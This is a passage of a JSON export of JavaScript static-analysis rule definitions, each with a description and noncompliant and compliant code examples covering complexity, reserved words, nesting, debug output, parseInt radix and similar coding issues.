Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n  function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n  var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n  <li> <code>await<\/code> <\/li>\n  <li> <code>class<\/code> <\/li>\n  <li> <code>const<\/code> <\/li>\n  <li> <code>enum<\/code> <\/li>\n  <li> <code>export<\/code> <\/li>\n  <li> <code>extends<\/code> <\/li>\n  <li> <code>implements<\/code> <\/li>\n  <li> <code>import<\/code> <\/li>\n  <li> <code>interface<\/code> <\/li>\n  <li> <code>let<\/code> <\/li>\n  <li> <code>package<\/code> <\/li>\n  <li> <code>private<\/code> <\/li>\n  <li> 
<code>protected<\/code> <\/li>\n  <li> <code>public<\/code> <\/li>\n  <li> <code>static<\/code> <\/li>\n  <li> <code>super<\/code> <\/li>\n  <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true };                 \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) {  \/\/ Noncompliant\n  if (i == 12) {\n    print(\"12\");\n    break myLabel;\n  }\n  print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i &lt; 10; i++) {   \/\/ Compliant\n  print(\"Loop\");\n  break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    \/* ... *\/\n    if (condition2) {                \/\/ Compliant - depth = 2\n      \/* ... *\/\n      for(int i = 0; i &lt; 10; i++) {  \/\/ Compliant - depth = 3, not exceeding the limit\n        \/* ... *\/\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            \/* ... *\/\n          }\n          return;\n        }\n      }\n    }\n  }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed &quot;if\/for\/while\/switch\/try&quot; statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. 
This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n  alert('hi');  \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n  alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and <code>condition ? 
ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{                                                      \/\/Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {                                   \/\/Compliant\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n   {                                                 \/\/Compliant\n        g: \"someValue\"\n   }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... 
*\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n  return numerator \/ denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  WEDNESDAY:   \/\/ instead of \"case WEDNESDAY\"\n    doSomething();\n    break;\n  ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    foo:for(i = 0 ; i &lt; X ; i++) {\n         \/* ... *\/\n        break foo;  \/\/ this break statement doesn't relate to the nesting case TUESDAY\n         \/* ... *\/\n    }\n    break;\n    \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  case WEDNESDAY:\n    doSomething();\n    break;\n  ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n    break;\n\n    \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n  doSomething();\n} else {\n  doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This rule ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n  function open() {  \/\/ Classic function declaration; not ignored\n    \/\/ ...\n  }\n\n  function read() {\n    \/\/ ...\n  }\n\n  function readlines() {\n    \/\/ ...\n  }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n  alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n    name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n    this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doFirstThing();\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n  case 3:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif ((a &gt;= 0 &amp;&amp; a &lt; 10) || (a &gt;= 20 &amp;&amp; a &lt; 50)) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doFirstThing();\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following 
<code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) {  \/\/ Noncompliant\n  \/\/ ...\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++, j++) {\n  \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i &lt; 10; i++) {\n  \/\/ ...\n  j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. 
Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined;  \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\";  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. 
But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  \/\/ Noncompliant; operation succeeds, but result is unexpected\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong 
direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i--) { \/\/ Noncompliant;\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i++) {\n  \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var i;  \/\/ Noncompliant; should be declared in if-block\n  if (a &gt; b) {\n    i = a;\n    console.log(i);\n    var x = a - b;  \/\/ Noncompliant; should be declared outside if-block\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var x = a - b;\n\n  if (a &gt; b) {\n    var i = a;\n    console.log(i);\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially 
impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n  <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError <\/li>\n  <li> Numbers and dates - Number, Math, Date <\/li>\n  <li> Text processing - String, RegExp <\/li>\n  <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Uint16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array <\/li>\n  <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n  <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n  <li> Control abstraction objects - Promise <\/li>\n  <li> Reflection - Reflect, Proxy <\/li>\n  <li> Internationalization - Intl <\/li>\n  <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\");  \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. 
Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this._name = name;  \/\/ assign to a backing field, not to \"name\" itself, or the setter recurses\n    return 42;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this._name = name;\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so attributes with spaces in their names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            'first name': 'Bob',      \/\/ Noncompliant\n            'birth date': new Date()  \/\/ Noncompliant\n        },\n    });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            firstName: 'Bob',\n            birthDate: new Date()\n        },\n    });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. 
Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n  doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. 
